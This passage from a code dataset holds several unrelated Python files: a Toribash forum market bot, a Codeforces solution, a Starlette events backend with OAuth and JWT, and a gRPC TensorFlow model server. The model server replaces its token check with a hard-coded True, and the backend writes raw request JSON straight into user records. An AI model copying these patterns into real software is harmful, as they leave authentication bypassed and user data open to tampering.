bs4\nfrom bs4 import BeautifulSoup\nimport http.cookiejar\nfrom http.cookiejar import CookieJar\nimport json\nimport urllib.request\nimport urllib.parse\nimport math\nimport config\nimport re\n\n\ncj = CookieJar()\ncookie_processor = urllib.request.HTTPCookieProcessor(cj)\nopener = urllib.request.build_opener(cookie_processor)\nopener.addheaders = [('User-agent', \"Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11\")]\n\nBASE = \"http://forum.toribash.com/\"\n\n\n\n\ndef login():\n    \n    form_data = {\"username\": config.username, \"password\": config.password, \"submit\": \"Login\"}\n    data = urllib.parse.urlencode(form_data)\n    binary_data = data.encode('utf-8') \n    req = opener.open(BASE + \"tori.php\", binary_data)\n    response = req.read()\n\ndef get(url, *args):\n    data = \"login.php\"\n    binary_data = data.encode('utf-8')\n    fullurl = BASE + url\n    response = opener.open(fullurl, *args, timeout=15).read()\n\t\t\n    if binary_data in response:\n        login()\n        return get(url, *args)\n    return response\n\ndef tc(username):\n    time.sleep(2)\n    r = get(\"tori_stats.php?format=json&username=\" + username)\n    decoded = r.decode('utf-8')\n    status = json.loads(decoded)\n    return status.get(\"tc\", \"0\")\n\t\t\ndef inventory(sid=0, userid=None):\n    #sid = 0 = deactivated\n    #sid = -1 = activated\n    #sid = -2 = market\n\n    page = get(\"tori_inventory.php?%s\" % urllib.parse.urlencode({\"sid\": sid, \"userid\": userid} if userid else {\"sid\": sid}))\n    soup = BeautifulSoup(page)\n    items = []\n\n    for item in soup.find_all(\"tr\", class_=lambda s: s in [\"market_active\", \"\"]):\n        id_ = int(item.find(\"input\").attrs[\"value\"])\n        items.append({\"id\": id_, \"name\": item.span.text})\n\n    return items\n\t\t\ndef search(item, max = 0, page = 1, action=\"search\"):\n\t\titems = []\n\n\t\tpage = get(\"tori_market.php?%s\" % urllib.parse.urlencode({\"action\": action, \"item\": item, \"max\": max, \"page\": page, \"format\": \"json\"}))\n\t\tpaged = page.decode('utf-8')\n\t\tpjson = json.loads(paged)\n\t\treturn (pjson[\"items\"])\n\t\t\ndef 
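
The opener set up at the top of market.py above is what keeps the forum session alive: one CookieJar shared by every request. A minimal sketch of the same pattern against a placeholder URL:

    import urllib.request
    from http.cookiejar import CookieJar

    cj = CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    opener.addheaders = [("User-agent", "Mozilla/5.0")]
    body = opener.open("http://example.com/", timeout=15).read()
    print(len(body), len(cj))  # bytes received, cookies captured so far
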
newest(page):\n\t\treturn search(\"\", \"\", page, \"\")\n\ndef buy(item):\n\t\tfu = urllib.parse.urlencode({\"inv\": item})\n\t\tf = fu.encode('utf-8')\n\t\tget(\"tori_market.php?action=buy_item\", f)\n\t\t\ndef sell(item_id, price):\n\t\tru = (\"tori_item.php?\" + urllib.parse.urlencode({\"invid\": item_id, \"action\": \"setprice\"}))\n\t\tfu = urllib.parse.urlencode({\"amount\": price})\n\t\tf = fu.encode('utf-8')\n\t\tget(ru, f)\n\t\t\n\ndef remove_from_market(item_id):\n\t\tget(\"tori_inventory.php?\" + urllib.parse.urlencode({\"action\": \"sale\", \"do\": \"remove\", \"inv\": item_id}))\n\t\t\ndef selling_price(item):\n\t\titems = json.load(open(\"items.json\"))\n\t\titem_names = {}\n\t\t\n\t\tfor i in range(0, len(items)):\n\t\t\t\titem_names[i] = {0: items[i][\"itemname\"].lower()}\n\t\t\t\tif item.lower() in item_names[i][0]:\n\t\t\t\t\titem = item_names[i][0]\n\t\t\t\t\tmarket_items = search(item)\n\t\t\t\t\tdiscount = 1\n\t\t\t\t\tif market_items:\n\t\t\t\t\t\tmarket_item = sorted(market_items, key=lambda k: k[\"price\"])[0]\n\t\t\t\t\t\tmin_price = market_item[\"price\"]\n\t\t\t\t\t\treturn int(min_price * discount)\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn int(int(items[i][\"price\"]-1))\n\t\t\n\t\t\n\ndef market_stats(page = 0):\n\t\tf = open(\"m.json\", \"r+\")\n\t\th = open(\"h.json\", \"r+\")\n\t\tfjson = json.load(f)\n\t\thjson = json.load(h)\n\t\thjsonval = {}\n\t\t\n\t\tfor key in hjson:\n\t\t\tfor i in hjson[key]:\n\t\t\t\thjsonval[len(hjsonval)] = hjson[key][i][\"inventid\"]\n\t\t\t\t\n\t\t\t\t\n\t\t\n\t\tfjsonval = {i[\"inventid\"] for i in fjson.values()}\n\t\t\n\t\tnewh= newest(page)\n\t\n\t\t\n\t\t\n\t\tfor i in range(0,len(newh)):\n\t\t\t\n\t\t\tif not newh[i][\"inventid\"] in fjsonval:\n\t\t\t\tfjson[str(len(fjson)+1)] = newh[i]\n\t\t\t\tprint(\"Wrote item to file\", newh[i][\"name\"], newh[i][\"price\"])\n\t\t\telif newh[i][\"inventid\"] in fjsonval:\n\t\t\t\tfor c in range(1, len(fjson)+1):\n\t\t\t\t\tif newh[i][\"inventid\"] == fjson[str(c)][\"inventid\"] and newh[i][\"price\"] != fjson[str(c)][\"price\"]:\n\t\t\t\t\t\tfjson[str(c)][\"price\"] = newh[i][\"price\"]\n\t\t\t\t\t\tprint(\"Price Update for item made:\", newh[i][\"name\"], newh[i][\"price\"])\n\t\t\t\t\t\t\n\t\tfor i in range(0, len(newh)):\n\t\t\n\t\t\tif not newh[i][\"inventid\"] in hjsonval.values():\n\t\t\t\t\n\t\t\t\ttry:\n\t\t\t\t\thjson[newh[i][\"name\"]] = {len(hjson[newh[i][\"name\"]])-1:{ \"price\": newh[i][\"price\"], \"inventid\": newh[i][\"inventid\"], \"market_date\": newh[i][\"market_date\"]}}\n\t\t\t\t\tprint(\"Wrote price statistic with:\", newh[i][\"name\"], newh[i][\"price\"], newh[i][\"market_date\"])\n\t\t\t\texcept KeyError:\n\t\t\t\t\thjson[newh[i][\"name\"]] = {}\n\t\t\t\t\thjson[newh[i][\"name\"]] = {\"0\":{ \"price\": newh[i][\"price\"], \"inventid\": newh[i][\"inventid\"], \"market_date\": newh[i][\"market_date\"]}}\n\t\t\t\t\t\n\t\t\t\t\n\t\t\telif newh[i][\"inventid\"] in hjsonval.values():\n\t\t\t\ttry:\n\t\t\t\t\tif newh[i][\"inventid\"] == hjson[newh[i][\"name\"]][len(hjson[newh[i][\"name\"]])-1][\"inventid\"] and newh[i][\"price\"] != hjson[newh[i][\"name\"]][len(hjson[newh[i][\"name\"]])-1][\"price\"]:\n\t\t\t\t\t\thjson[newh[i][\"name\"]][\"price\"] = newh[i][\"price\"]\n\t\t\t\t\t\thjson[[newh[i][\"name\"]]][\"market_date\"] = newh[i][\"market_date\"]\n\t\t\t\t\t\tprint(\"Updated price statistic with:\", newh[i][\"name\"], newh[i][\"price\"])\n\t\t\t\texcept KeyError:\n\t\t\t\t\tpass\n\t\t\t\t\t\n\t\t\t\t\n\t\t\t\n\t\t\t\n\t\t\t\n\t\t\"\"\"for x in 
range(1,len(fjson)+1):\n\t\t\tprint(fjson[str(x)][\"name\"], fjson[str(x)][\"price\"],\"\\t\\t\", fjson[str(x)][\"username\"] )\"\"\"\n\t\t\n\t\t\n\t\tfunjson = json.dumps(fjson)\n\t\tf.seek(0)\n\t\tf.truncate()\n\t\tf.write(funjson)\n\t\tf.close()\n\t\t\n\t\thunjson = json.dumps(hjson)\n\t\th.seek(0)\n\t\th.truncate()\n\t\th.write(hunjson)\n\t\th.close()\n\t\t\ndef item_val(name):\n\t\tk = search(name, 999999)\n\t\treturn k\n\n\t\t\n\t\t\n\nwhile True:\n\tmarket_stats()\n\ttime.sleep(5)\n\n\n\n\n\n","sub_path":"market.py","file_name":"market.py","file_ext":"py","file_size_in_byte":5564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"519131253","text":"import copy\npages=int(input())\n\ndays=input()\n\ndays=days.split(\" \")\ntemp=copy.deepcopy(pages)\ni=0\nwhile(temp>0):\n if i<=6:\n p=int(days[i])\n temp-=p\n i+=1\n else:\n i=0\n\nif i% 7==0:\n print(7)\nelse:\n print(i%7)","sub_path":"139A - petr and book codeforces.py","file_name":"139A - petr and book codeforces.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"59469565","text":"from datetime import datetime\n\nimport databases\nimport sqlalchemy\nimport uvicorn\nimport jwt\nfrom sqlalchemy import and_, text\nfrom starlette.applications import Starlette\nfrom starlette.authentication import requires\nfrom starlette.config import Config\nfrom starlette.middleware import Middleware\nfrom starlette.middleware.authentication import AuthenticationMiddleware\nfrom starlette.middleware.cors import CORSMiddleware\nfrom starlette.middleware.sessions import SessionMiddleware\nfrom starlette.responses import JSONResponse, RedirectResponse\nfrom starlette.routing import Route\nfrom starlette.requests import Request\nfrom authlib.integrations.starlette_client import OAuth\nfrom starlette_jwt import JWTAuthenticationBackend\n\nconfig = Config('.env')\nDATABASE_URL = config('DATABASE_URL')\nmetadata = sqlalchemy.MetaData()\noauth = OAuth(config)\noauth.register(\n name='google',\n server_metadata_url='https://accounts.google.com/.well-known/openid-configuration',\n client_kwargs={\n 'scope': 'openid email profile'\n }\n)\noauth.register(\n name='github',\n access_token_url='https://github.com/login/oauth/access_token',\n access_token_params=None,\n authorize_url='https://github.com/login/oauth/authorize',\n authorize_params=None,\n api_base_url='https://api.github.com/',\n client_kwargs={'scope': 'user:email read:user'},\n)\n\n# Entities\n\nactivities = sqlalchemy.Table(\n \"activities\",\n metadata,\n sqlalchemy.Column(\"id\", sqlalchemy.String, primary_key=True),\n sqlalchemy.Column(\"name\", sqlalchemy.String),\n sqlalchemy.Column(\"active\", sqlalchemy.Boolean),\n)\n\nusers = sqlalchemy.Table(\n \"users\",\n metadata,\n sqlalchemy.Column(\"id\", sqlalchemy.String, primary_key=True),\n sqlalchemy.Column(\"email\", sqlalchemy.String),\n sqlalchemy.Column(\"name\", sqlalchemy.String),\n sqlalchemy.Column(\"picture\", sqlalchemy.String),\n sqlalchemy.Column(\"height\", sqlalchemy.Float),\n sqlalchemy.Column(\"weight\", sqlalchemy.Float),\n sqlalchemy.Column(\"birth_date\", sqlalchemy.Date),\n sqlalchemy.Column(\"register_date\", sqlalchemy.Date),\n sqlalchemy.Column(\"telegram\", sqlalchemy.String),\n sqlalchemy.Column(\"instagram\", sqlalchemy.String),\n sqlalchemy.Column(\"vk\", sqlalchemy.String)\n)\n\nevents = sqlalchemy.Table(\n \"events\",\n metadata,\n sqlalchemy.Column(\"id\", 
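
The reading-schedule loop in the snippet above re-scans the week until the book runs out; reducing the page count modulo one week's total gives the answer in a single pass. A sketch of the same logic, assuming at least one non-zero day as the problem guarantees:

    pages = 12
    days = [1, 3, 2, 1, 1, 3, 2]
    pages = pages % sum(days) or sum(days)  # finishing exactly -> last counted day
    for day, read in enumerate(days, start=1):
        pages -= read
        if pages <= 0:
            print(day)  # -> 7 here
            break
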
sqlalchemy.String, primary_key=True),\n sqlalchemy.Column(\"title\", sqlalchemy.String),\n sqlalchemy.Column(\"start_time\", sqlalchemy.DateTime),\n sqlalchemy.Column(\"city\", sqlalchemy.String),\n sqlalchemy.Column(\"place\", sqlalchemy.String),\n sqlalchemy.Column(\"paid\", sqlalchemy.Boolean),\n sqlalchemy.Column(\"description\", sqlalchemy.String),\n sqlalchemy.Column(\"organization_description\", sqlalchemy.String),\n sqlalchemy.Column(\"paid_description\", sqlalchemy.String),\n sqlalchemy.Column(\"activity\", sqlalchemy.String),\n sqlalchemy.Column(\"section\", sqlalchemy.Boolean)\n)\n\nevent_visitors = sqlalchemy.Table(\n \"event_visitors\",\n metadata,\n sqlalchemy.Column(\"user_id\", sqlalchemy.String),\n sqlalchemy.Column(\"event_id\", sqlalchemy.String)\n)\n\nevent_likes = sqlalchemy.Table(\n \"event_likes\",\n metadata,\n sqlalchemy.Column(\"user_id\", sqlalchemy.String),\n sqlalchemy.Column(\"event_id\", sqlalchemy.String)\n)\n\ndatabase = databases.Database(DATABASE_URL)\n\n\n# Routing\n\nasync def login(request: Request):\n redirect_uri = 'https://api.healthy.adds.md/auth/' + request.path_params['provider']\n return await oauth.create_client(request.path_params['provider']).authorize_redirect(request, redirect_uri)\n\n\nasync def auth(request: Request):\n if request.path_params['provider'] == \"google\":\n token = await oauth.google.authorize_access_token(request)\n user = await oauth.google.parse_id_token(request, token)\n\n users_found = await database.fetch_all(users.count().where(users.c.email == user[\"email\"]))\n users_found = users_found[0][0]\n\n if users_found == 0:\n await database.execute(\n users.insert().values(\n email=user[\"email\"],\n name=user[\"name\"],\n picture=user[\"picture\"]\n )\n )\n\n user_found = await database.fetch_one(users.select().where(users.c.email == user[\"email\"]))\n encoded_jwt = jwt.encode({\n \"username\": str(user_found['id']),\n \"email\": user[\"email\"],\n \"name\": user[\"name\"],\n \"picture\": user[\"picture\"]\n }, config(\"JWT_KEY\"), algorithm='HS256')\n\n return RedirectResponse(\"https://healthy.adds.md/login/\" + encoded_jwt.decode(\"utf-8\"))\n\n\napp = Starlette(\n debug=True,\n routes=[\n Route('/login/{provider}', endpoint=login),\n Route('/auth/{provider}', endpoint=auth),\n ],\n on_startup=[database.connect],\n on_shutdown=[database.disconnect],\n middleware=[\n Middleware(CORSMiddleware, allow_origins=['*'], allow_methods=['*'], allow_headers=['*'],\n allow_credentials=True),\n Middleware(SessionMiddleware, secret_key=config('SESSION_SECRET')),\n Middleware(AuthenticationMiddleware, backend=JWTAuthenticationBackend(\n secret_key=config(\"JWT_KEY\"),\n prefix='JWT'\n ))\n ]\n)\n\n\n@app.route(\"/profile\", [\"GET\"])\n@requires('authenticated')\nasync def profile(request):\n user = await database.fetch_one(users.select().where(users.c.id == request.user.username))\n return JSONResponse({\n \"user_id\": str(user['id']),\n \"email\": user['email'],\n \"picture\": user['picture'],\n \"height\": user['height'],\n \"weight\": user['weight'],\n \"birth_date\": user['birth_date'].strftime('%Y-%m-%d') if user['birth_date'] is not None else None,\n \"register_date\": user['register_date'].strftime('%Y-%m-%d %H:%M'),\n \"telegram\": user['telegram'],\n \"instagram\": user['instagram'],\n \"vk\": user['vk']\n })\n\n\n@app.route(\"/profile\", [\"POST\"])\n@requires('authenticated')\nasync def profile_edit(request):\n req = await request.json()\n\n query = users.update().values(**req).where(users.c.id == 
request.user.username)\n\n await database.execute(query)\n\n return JSONResponse({\"status\": \"ok\"})\n\n\n@app.route(\"/activities\")\nasync def list_activities(request):\n query = activities.select()\n results = await database.fetch_all(query)\n return JSONResponse([\n {\n \"id\": result[\"id\"],\n \"name\": result[\"name\"]\n } for result in results\n ])\n\n\n@app.route(\"/event\", [\"POST\"])\n@requires('authenticated')\nasync def add_event(request):\n req = await request.json()\n await database.execute(\n events.insert().values(\n title=req['title'],\n start_time=datetime.strptime(req['start_time'], '%Y-%m-%d %H:%M'),\n city=req['city'],\n place=req['place'],\n paid=req['paid'],\n description=req['description'],\n organization_description=req['organization_description'],\n paid_description=req['paid_description'],\n activity=req['activity'],\n section=req['section']\n )\n )\n return JSONResponse({\"status\": \"ok\"})\n\n\n@app.route(\"/event/participation\", [\"POST\"])\n@requires('authenticated')\nasync def participate(request):\n await database.execute(\n event_visitors.insert().values(\n user_id=request.user.username,\n event_id=request.query_params['event']\n )\n )\n return JSONResponse({\"status\": \"ok\"})\n\n\n@app.route(\"/event/participation\", [\"DELETE\"])\n@requires('authenticated')\nasync def participate(request):\n await database.execute(\n event_visitors.delete().where(\n and_(\n event_visitors.c.user_id == request.user.username,\n event_visitors.c.event_id == request.query_params['event']\n )\n )\n )\n return JSONResponse({\"status\": \"ok\"})\n\n\n@app.route(\"/event/participation\", [\"GET\"])\nasync def get_participators(request):\n query = text(\n \"\"\"\n select u.id, u.name, u.picture from event_visitors ev\n join users u on ev.user_id = u.id\n where ev.event_id = :event_id\n \"\"\"\n )\n query = query.bindparams(event_id=request.query_params['event'])\n participants = await database.fetch_all(\n query\n )\n\n return JSONResponse([{\n \"user_id\": str(p['id']),\n \"picture\": p['picture'],\n \"name\": p['name']\n } for p in participants])\n\n\n@app.route(\"/event/like\", [\"POST\"])\n@requires('authenticated')\nasync def participate(request):\n await database.execute(\n event_likes.insert().values(\n user_id=request.user.username,\n event_id=request.query_params['event']\n )\n )\n return JSONResponse({\"status\": \"ok\"})\n\n\n@app.route(\"/event/like\", [\"DELETE\"])\n@requires('authenticated')\nasync def participate(request):\n await database.execute(\n event_likes.delete().where(\n and_(\n event_visitors.c.user_id == request.user.username,\n event_visitors.c.event_id == request.query_params['event']\n )\n )\n )\n return JSONResponse({\"status\": \"ok\"})\n\n\n@app.route(\"/event\", [\"GET\"])\nasync def get_events(request):\n date_from = datetime.now()\n if 'date_from' in request.query_params and request.query_params['date_from'] is not None:\n date_from = datetime.strptime(request.query_params['date_from'], '%Y-%m-%d')\n\n date_to = None\n if 'date_to' in request.query_params and request.query_params['date_to'] is not None:\n date_to = datetime.strptime(request.query_params['date_to'], '%Y-%m-%d')\n\n if date_to is not None:\n query = and_(\n events.c.start_time >= date_from,\n events.c.start_time <= date_to\n )\n else:\n query = events.c.start_time >= date_from\n\n if 'paid' in request.query_params and request.query_params['paid'] is not None:\n query = and_(\n query,\n events.c.paid == (request.query_params['paid'] in ['1', 1, 'true'])\n )\n\n if 
'activity' in request.query_params and request.query_params['activity'] is not None:\n query = and_(\n query,\n events.c.activity == request.query_params['activity']\n )\n\n if 'section' in request.query_params and request.query_params['section'] is not None:\n query = and_(\n query,\n events.c.section == request.query_params['section']\n )\n\n if 'id' in request.query_params and request.query_params['id'] is not None:\n query = and_(\n query,\n events.c.id == request.query_params['id']\n )\n\n results = await database.fetch_all(\n events.select(query)\n )\n\n likes = []\n\n if request.user.is_authenticated:\n likes = await database.fetch_all(\n event_likes.select().where(\n event_likes.c.user_id == request.user.username\n )\n )\n\n return JSONResponse(\n [{\n \"id\": str(r[\"id\"]),\n \"title\": r[\"title\"],\n \"start_time\": r[\"start_time\"].strftime('%Y-%m-%d %H:%M'),\n \"city\": r[\"city\"],\n \"place\": r[\"place\"],\n \"paid\": r[\"paid\"],\n \"description\": r[\"description\"],\n \"organization_description\": r[\"organization_description\"],\n \"paid_description\": r[\"paid_description\"],\n \"activity\": r[\"activity\"],\n \"section\": r[\"section\"],\n \"like\": len(list(filter(lambda like: str(like['event_id']) == str(r[\"id\"]), likes))) > 0\n } for r in results]\n )\n\n\nif __name__ == '__main__':\n uvicorn.run(app, host='0.0.0.0', port=8001)\n","sub_path":"healthy.py","file_name":"healthy.py","file_ext":"py","file_size_in_byte":11733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"568499635","text":"\"\"\"grpc server\"\"\"\r\nfrom concurrent import futures\r\nfrom datetime import datetime\r\nimport os\r\nimport sys\r\nimport time\r\nimport errno\r\nimport logging\r\nimport threading\r\nimport json\r\nimport grpc\r\nimport tensorflow as tf\r\nimport pandas as pd\r\n\r\nLOG=logging.getLogger(__name__)\r\nLOG.setLevel(logging.INFO)\r\nLOG.addHandler(logging.StreamHandler(stream=sys.stdout))\r\n# Disabling this pylint error after checking that this line adheres to\r\n# tensorflow documentation\r\n# pylint: disable=E0611\r\nfrom tensorflow.python.framework import (\r\n tensor_util,\r\n dtypes\r\n)\r\nfrom mlpkitsecurity import SecurityError\r\nfrom tensorflow_serving.apis import (\r\n predict_pb2 as tensorflow__serving_dot_apis_dot_predict__pb2,\r\n prediction_service_pb2 as tensorflow__serving_dot_apis_dot_prediction_service__pb2,\r\n classification_pb2 as tensorflow__serving_dot_apis_dot_classification__pb2\r\n)\r\nfrom mlfmodelserver.token_validator import TokenValidator\r\nfrom mlfmodelserver.healthcheck import healthcheck_pb2 as healthcheck_dot_healthcheck__pb2, \\\r\n healthcheck_pb2_grpc as healthcheck_dot_healthcheck__pb2__grpc\r\n\r\nINPUT_TYPE_BYTES = 0\r\nINPUT_TYPE_INTS = 1\r\nINPUT_TYPE_FLOATS = 2\r\nINPUT_TYPE_DOUBLES = 3\r\nINPUT_TYPE_STRINGS = 4\r\n_ONE_DAY_IN_SECONDS = 60 * 60 * 24\r\n\r\n\r\nclass Metric:\r\n \"\"\"\r\n Metric class for abstracting all future metric reporting e.g Prometheus\r\n \"\"\"\r\n\r\n def __init__(self, name, model_metrics):\r\n self.name = name\r\n self.metrics = model_metrics\r\n\r\n def report(self):\r\n \"\"\"\r\n Log metrics\r\n \"\"\"\r\n LOG.info(self.metrics)\r\n\r\n\r\nclass Servicer(tensorflow__serving_dot_apis_dot_prediction_service__pb2.PredictionServiceServicer):\r\n \"\"\"\r\n class Servicer\r\n \"\"\"\r\n\r\n def _Validations(self, request, context):\r\n try:\r\n metadata = context.invocation_metadata()\r\n\r\n token_validator = TokenValidator(context, metadata)\r\n 
LOG.info(\"Model Name %s\", request.model_spec.name)\r\n LOG.info(\"Start of validating token\")\r\n token_result = True#token_validator.validate_token()\r\n\r\n if request.model_spec.name != self.model.model_name:\r\n LOG.error(\"Model spec name and model env name does not match\")\r\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\r\n raise NotImplementedError('Model spec name and model env does not match' +\r\n str('Model spec name' + request.model_spec.name))\r\n return False\r\n if request.model_spec.name is None:\r\n LOG.error(\"Model spec name and model env name does not match\")\r\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\r\n raise NotImplementedError('Given Model Not Loaded' +\r\n str('Model spec name' + request.model_spec.name))\r\n return False\r\n\r\n if token_result is True:\r\n LOG.info('token validated successfully')\r\n context.set_code(grpc.StatusCode.OK)\r\n context.set_details(self.model.model_name)\r\n return True\r\n\r\n return False\r\n except SecurityError as se:\r\n s = getattr(se, 'message', str(se))\r\n raise SecurityError(s)\r\n return False\r\n\r\n\r\n\r\n def Classify(self, request, context):\r\n try:\r\n example = request.input.example_list.examples[0]\r\n\r\n start_time_millis = self.getCurrentTimeinMillis()\r\n time_1 = datetime.now()\r\n if self._Validations(request, context) is True:\r\n time_2 = datetime.now()\r\n\r\n example = request.input.example_list.examples[0]\r\n\r\n idx = 0\r\n final_input = []\r\n final_labels = []\r\n for k in example.features.feature.keys():\r\n v = example.features.feature[k]\r\n int_list_value = list(v.int64_list.value)\r\n float_list_value = list(v.float_list.value)\r\n byte_list_value = list(v.bytes_list.value)\r\n\r\n if len(int_list_value) > 0:\r\n final_input.append(int_list_value)\r\n final_labels.append(k)\r\n elif len(float_list_value) > 0:\r\n final_input.append(float_list_value)\r\n final_labels.append(k)\r\n elif len(byte_list_value) > 0:\r\n final_input.append(byte_list_value)\r\n final_labels.append(k)\r\n else:\r\n LOG.info(\"Input param empty, ignoring it\")\r\n idx = idx + 1\r\n\r\n classification_request = pd.DataFrame.from_records(list(zip(*final_input)), columns=final_labels)\r\n\r\n try:\r\n classification_outputs = self.model.wrapper_classification_func(classification_request)\r\n LOG.info(\"the output from the model's classification function %s\", classification_outputs)\r\n response = tensorflow__serving_dot_apis_dot_classification__pb2.ClassificationResponse()\r\n\r\n except grpc.RpcError as grpc_error:\r\n end_time_millis = self.getCurrentTimeinMillis()\r\n LOG.error(\"Error while doing Classification\")\r\n requestDurationInMillis = str(end_time_millis - start_time_millis)\r\n self.logRequests(self.model.model_name, requestDurationInMillis, str(0))\r\n LOG.error(\"grpc error : %s\", str(grpc_error))\r\n s = getattr(grpc_error, 'message', str(grpc_error))\r\n raise grpc.RpcError(grpc_error)\r\n return None\r\n\r\n classifications = []\r\n for idx in range(0, classification_request.shape[0]):\r\n classes = []\r\n classification = tensorflow__serving_dot_apis_dot_classification__pb2.Classifications()\r\n for k, v in classification_outputs.items():\r\n class_data = tensorflow__serving_dot_apis_dot_classification__pb2.Class()\r\n class_data.label = \"Class-\" + k\r\n class_data.score = v[idx]\r\n classes.append(class_data)\r\n classification.classes.extend(classes)\r\n classifications.append(classification)\r\n response.result.classifications.extend(classifications)\r\n\r\n return response\r\n 
\r\n    def Predict(self, request, context):\r\n        try:\r\n            start_time_millis = self.getCurrentTimeinMillis()\r\n            time_1 = datetime.now()\r\n            if self._Validations(request, context):\r\n                time_2 = datetime.now()\r\n                predict_request = {}\r\n\r\n                for k, v in request.inputs.items():\r\n                    predict_request[k] = tensor_util.MakeNdarray(request.inputs[k])\r\n                    if v.dtype == dtypes.string:\r\n                        predict_request[k] = predict_request[k].astype(str)\r\n\r\n                time_3 = datetime.now()\r\n\r\n                for k, v in predict_request.items():\r\n                    LOG.info(\"the key :%s\", k)\r\n                    LOG.info(\"the value :%s\", v)\r\n                # Add the more specific try catch request for predict request\r\n\r\n                try:\r\n                    predict_outputs = self.model.wrapper_predict_func(predict_request)\r\n                    LOG.info(\"the output from the model's predict function %s\", predict_outputs)\r\n                    response = tensorflow__serving_dot_apis_dot_predict__pb2.PredictResponse()\r\n                except grpc.RpcError as grpc_error:\r\n                    end_time_millis = self.getCurrentTimeinMillis()\r\n                    LOG.error(\"Error while doing Prediction\")\r\n                    requestDurationInMillis = str(end_time_millis - start_time_millis)\r\n                    self.logRequests(self.model.model_name, requestDurationInMillis, str(0))\r\n                    LOG.error(\"grpc error : %s\", str(grpc_error))\r\n                    s = getattr(grpc_error, 'message', str(grpc_error))\r\n                    raise grpc.RpcError(grpc_error)\r\n\r\n                for k, v in predict_outputs.items():\r\n                    # Disabling this pylint error after checking that this line adheres to\r\n                    # tensorflow documentation\r\n                    # pylint: disable=E1101\r\n                    response.outputs[k].CopyFrom(tf.contrib.util.make_tensor_proto(v))\r\n                # log the response time taken to serve the request\r\n\r\n                time_4 = datetime.now()\r\n                end_time_millis = self.getCurrentTimeinMillis()\r\n\r\n                validation_time_ms = (time_2 - time_1).microseconds\r\n                parse_time = (time_3 - time_2).microseconds\r\n                handle_time = (time_4 - time_3).microseconds\r\n                model_metrics = {\"mlf_mc_model_name\": self.model.model_name,\r\n                                 \"mlf_mc_token_validation_time_ms\": validation_time_ms / 1000,\r\n                                 \"mlf_mc_parse_time_ms\": parse_time / 1000,\r\n                                 \"mlf_mc_handle_time_ms\": handle_time / 1000\r\n                                 }\r\n                self.collect_metrics(self.model.model_name, model_metrics)\r\n                requestDurationInMillis = str(end_time_millis - start_time_millis)\r\n                self.logRequests(self.model.model_name, requestDurationInMillis, str(1))\r\n                return response\r\n            else:\r\n                requestDurationInMillis = str(self.getCurrentTimeinMillis() - start_time_millis)\r\n                LOG.error(\"Error while validating JWT token, token not validated successfully\")\r\n                self.logRequests(self.model.model_name, requestDurationInMillis, str(0))\r\n                return None\r\n\r\n        except Exception as ex:\r\n            s = getattr(ex, 'message', str(ex))\r\n            raise Exception(s)\r\n\r\n    def logRequests(self, model_name, requestDurationInMillis, success):\r\n        current_time = datetime.now().isoformat()\r\n        LOG.info(current_time + \" :\" + \" ModelName: [\" + str(model_name) + \"] Success: [\" + success + \"]\" +\r\n                 \" RequestDurationMillis: [\" + str(requestDurationInMillis) + \"]\")\r\n\r\n    def collect_metrics(self, model_name, model_metrics):\r\n        metrics = Metric(model_name, model_metrics)\r\n        metrics.report()\r\n\r\n    def getCurrentTimeinMillis(self):\r\n        return int(round(time.time() * 1000))\r\n\r\n    def Check(self, request, context):\r\n        # Disabling this pylint error as the healthcheck\r\n        # implementation follows grpc documentation\r\n        # pylint: 
disable=E1101\r\n if self.pod_health_status_path:\r\n ''' Read the readiness/health status from the health status log file'''\r\n try:\r\n with open('{}/{}.json'.format(self.pod_health_status_path, self.model_env['model_container_pod_name'])) \\\r\n as json_file:\r\n health_status = json.load(json_file)\r\n if health_status['Status'] == '1':\r\n return healthcheck_dot_healthcheck__pb2.HealthCheckResponse(status=\r\n healthcheck_dot_healthcheck__pb2.\r\n HealthCheckResponse.ServingStatus.\r\n Name(1))\r\n else:\r\n return healthcheck_dot_healthcheck__pb2.HealthCheckResponse(status=\r\n healthcheck_dot_healthcheck__pb2.\r\n HealthCheckResponse.ServingStatus.\r\n Name(2))\r\n except IOError:\r\n LOG.info(\"IO Error\")\r\n return healthcheck_dot_healthcheck__pb2.HealthCheckResponse(status=healthcheck_dot_healthcheck__pb2.\r\n HealthCheckResponse.ServingStatus.Name(\r\n 0))\r\n else:\r\n return healthcheck_dot_healthcheck__pb2.HealthCheckResponse(status=healthcheck_dot_healthcheck__pb2.\r\n HealthCheckResponse.ServingStatus.Name(1))\r\n\r\n\r\nclass ModelContainerBase(object):\r\n def predict_ints(self, inputs):\r\n pass\r\n\r\n def predict_floats(self, inputs):\r\n pass\r\n\r\n def predict_doubles(self, inputs):\r\n pass\r\n\r\n def predict_bytes(self, inputs):\r\n pass\r\n\r\n def predict_strings(self, inputs):\r\n pass\r\n\r\n\r\n# Inheriting the base class 'Thread'\r\nclass AsyncWrite(threading.Thread):\r\n def __init__(self, model_env, model_health_status_log, pod_health_status_path):\r\n # calling superclass init\r\n threading.Thread.__init__(self)\r\n self.model_env = model_env\r\n self.model_health_status_log = model_health_status_log\r\n self.pod_health_status_path = pod_health_status_path\r\n\r\n def run(self):\r\n while True:\r\n with open('{}/{}.json'.format(self.pod_health_status_path,\r\n self.model_env['model_container_pod_name']),\r\n mode='w') as outfile:\r\n print('Updating Container Health Status file ' + self.pod_health_status_path)\r\n LOG.info(\"Health status log %s\",self.model_health_status_log)\r\n json.dump(self.model_health_status_log, outfile)\r\n\r\n time.sleep(int(self.model_env['status_exporter_sleep_time']))\r\n\r\n\r\nclass GrpcServer:\r\n\r\n def get_model_health_status(self):\r\n return self.model_health_status\r\n\r\n def set_model_health_status(self, model_health_status):\r\n self.model_health_status = model_health_status\r\n\r\n def read_env(self):\r\n model_env = dict()\r\n model_env['models_health_base_path'] = os.environ.get('MODELS_HEALTH_BASE_PATH', '/')\r\n model_env['model_container_id'] = os.environ.get('MODEL_CONTAINER_ID')\r\n model_env['model_container_pod_name'] = os.environ.get('MODEL_CONTAINER_POD_NAME', 